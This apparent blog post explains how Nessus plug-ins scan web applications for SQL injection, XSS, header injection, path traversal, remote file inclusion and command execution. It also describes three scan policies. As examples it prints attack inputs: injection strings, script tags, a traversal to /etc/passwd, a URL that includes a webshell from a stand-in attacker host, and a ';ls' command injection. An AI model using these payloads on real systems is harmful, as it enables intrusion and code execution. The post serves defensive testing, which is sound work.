Securebits Blog

Nessus, ranked the first among the top 100 security tools, has been known traditionally as a “network” vulnerability scanner. Nessus scans Operating Systems and services at the TCP/UDP layer and below, and discovers vulnerabilities in these services. Nessus has not been known to scan the applications running on top of TCP/UDP layer. Scanning and discovering vulnerabilities in Web Applications have been left to specialized scanners which only scan and pen-test web applications.

Recently, the Nessus research team has extended the capability of Nessus to start targeting Web Applications. The research is still going on to produce effective plug-ins and parameters for enhancing the capability of scanning Web Applications. Now, there is a Nessus plug-in for every web application vulnerability class; the following is a list of these vulnerability classes along with references to their corresponding Nessus plug-ins:

1. SQL Injection Vulnerability Class
Plug-in Name: sql_injection.nasl
Plug-in Family: CGI abuses

This plug-in tests for SQL Injection vulnerabilities. It tries to insert abnormal data into any input field the user has access to, and checks whether the application returns any unexpected error. For example, inserting data such as “ or 1=1;-- or ‘or ‘a’ =’a could actually return an error or break the application if it is vulnerable to SQL Injection.

2. Cross-Site Scripting (XSS) Vulnerability Class
Plug-in Name: torture_cgi_cross_site_scripting.nasl
Plug-in Family: CGI abuses : XSS

This plug-in tests for both reflective and persistent XSS vulnerabilities. Just like the previous test (i.e. SQL Injection), this test involves inserting abnormal data into input fields and monitor how the application behaves. Simple examples of XSS injection are:
(a) <script>alert('XSS')</script>
(b) <IMG """><SCRIPT>alert("XSS" )</SCRIPT>">

3. HTTP Header Injection Vulnerability Class
Plug-in Name: torture_cgi_header_injection.nasl
Plug-in Family: CGI abuses

This plug-in injects arbitrary data in the input fields of the web application and monitors the HTTP headers of the responses. If the response header could be influenced by the arbitrary injected data, it is said that the application is vulnerable to HTTP Header injection. For example, let’s say that the “username” sent from an input field becomes part of the cookie set by the server; this cookie will be part of the HTTP response. We can insert in the username field the following data: myname\r\nSet-Cookie: MyInjectedCookie=injected If the server is vulnerable to HTTP Header Injection, the HTTP header in the response will contain an additional entry which will create a new (injected) cookie in the user’s browser.

4. Path Traversal Vulnerability Class
Plug-in Name: torture_cgi_directory_traversal.nasl
Plug-in Family: CGI abuses

This plug-in discovers whether the web application is vulnerable to a path traversal vulnerability. Path Traversal (or Directory Traversal) happens when the end user (probable an attacker) is able to get outside the permitted used web directory and start navigating through directories which he/she is not allowed to navigate. For example, under normal circumstances, the end user cannot access the file /etc/passwd on the web server. However, if the web server is vulnerable to a Directory Traversal, inserting data like ../../../../../../../../../etc/passwd in an input field could result in the attacker being able to view the passwd file.

5. Remote File Inclusion Vulnerability Class
Plug-in Name: torture_cgi_remote_file_inclusion.nasl
Plug-in Family: CGI abuses

A web application is said to be vulnerable to File Inclusion when the attacker is able to execute (i.e. include) his/her own PHP code in that remote web application. The attack exploits the PHP function include($filename) , or other similar functions, when the argument $filename can be modified from the client side and there is no proper checking on the server side. For example, the application might display a page requested by the URL:
http:// www .example.com/index.php?page=validpagename
The PHP code that processes the page variable is:
include($page);
The attacker can run his/her own php code using a URL like this:
http:// www .example.com/index.php?page=http://attacker.org/webshell.php

6. Command Execution Vulnerability Class
Plug-in Name: torture_cgi_command_exec.nasl
Plug-in Family: CGI abuses

Command Execution Vulnerability allows the attacker to execute arbitrary commands on the remote web server due to the lack of proper input validation. For example, an application that takes an IP address from the user and performs “ping” quest towards that target might use a URL like:
http:// www .example.org/index.php?ip=1.1.1.1
The PHP code that processes this URL might be the following:
system(“ping $ip");
Due to the lack of input validation, an attacker can execute any command like:
http:// www .example.org/index.php?ip=1.1.1.1;ls

For scanning web applications, two Nessus plug-in Families must be selected: “CGI Abuses” and “CGI Abuses: XSS.” These two families contain all plug-ins related to web application penetration test including the 6 plug-ins mentioned above. It is also recommended to select other plug-in families like “Database” and “FTP” since normally a web application needs a database for storage and an FTP so that the administrator can remotely update the files.

I created following downloadable Nessus file <webapps.nessus> which contains three policies for web application testing; each policy is defined by its level of aggressiveness as follows:

(1) Web Application Test (level 1)
- This policy is the least aggressive one among the three.
- It has the following Plug-in Families enabled: CGI Abuses, CGI Abuses: XSS, Databases, General, Service Detection, and Web Servers.
- This policy has the option “Safe Checks” enabled; this option will make sure that the scan does not cause the target to crash.
- The following advanced Global Variable Settings options are enabled:
Enable CGI Scanning, Enable Experimental Scripts, and Thorough Tests (slow)
- The following advanced Web Application Tests Settings options are enabled:
Enabled Web Application Tests and Send POST requests

(2) Web Application Test (level 2)
- This policy is moderately aggressive one among the three.
- It has the following Plug-in Families enabled: CGI Abuses, CGI Abuses: XSS, Databases, FTP, Gain a Shell Remotely, Gain Root Remotely, General, Service Detection, and Web Servers.
- This policy has the option “Safe Checks” enabled; this option will make sure that the scan does not cause the target to crash.
- The following advanced Global Variable Settings options are enabled:
Enable CGI Scanning, Enable Experimental Scripts, and Thorough Tests (slow)
- The following advanced Web Application Tests Settings options are enabled:
Enabled Web Application Tests and Send POST requests

(3) Web Application Test (level 3)
- This policy is the most aggressive one among the three.
- It has the following Plug-in Families enabled: CGI Abuses, CGI Abuses: XSS, Databases, FTP, Gain a Shell Remotely, Gain Root Remotely, General, Service Detection, and Web Servers.
- This policy does NOT have the option “Safe Checks” enabled; this will cause the scanner to fire dangerous plug-ins that may cause DoS or may cause the target to crash.
- The following advanced Global Variable Settings options are enabled:
Enable CGI Scanning, Enable Experimental Scripts, and Thorough Tests (slow)
- The following advanced Web Application Tests Settings options are enabled:
Enabled Web Application Tests, Send POST requests, and Test Embedded Web Servers.

Finally, it is worth mentioning that the Nessus application can integrate Nikto application, a small and fast web server scanner, into its scan. This is done through the plug-in Nikto.nasl that is part of the CGI Abuses family. There are few important point to take into consideration when incorporating Nikto with Nessus:
- The Nikto.nasl only runs on UNIX systems.
- Nikto application must be installed manually by the user.
- The script nikto.pl must be in the PATH of the same account that runs Nessus.

References
1. Enhanced Web Application Attacks Added to Nessus
2. Tips for Using Nessus in Web Application Testing
3. Using Nessus to call Nikto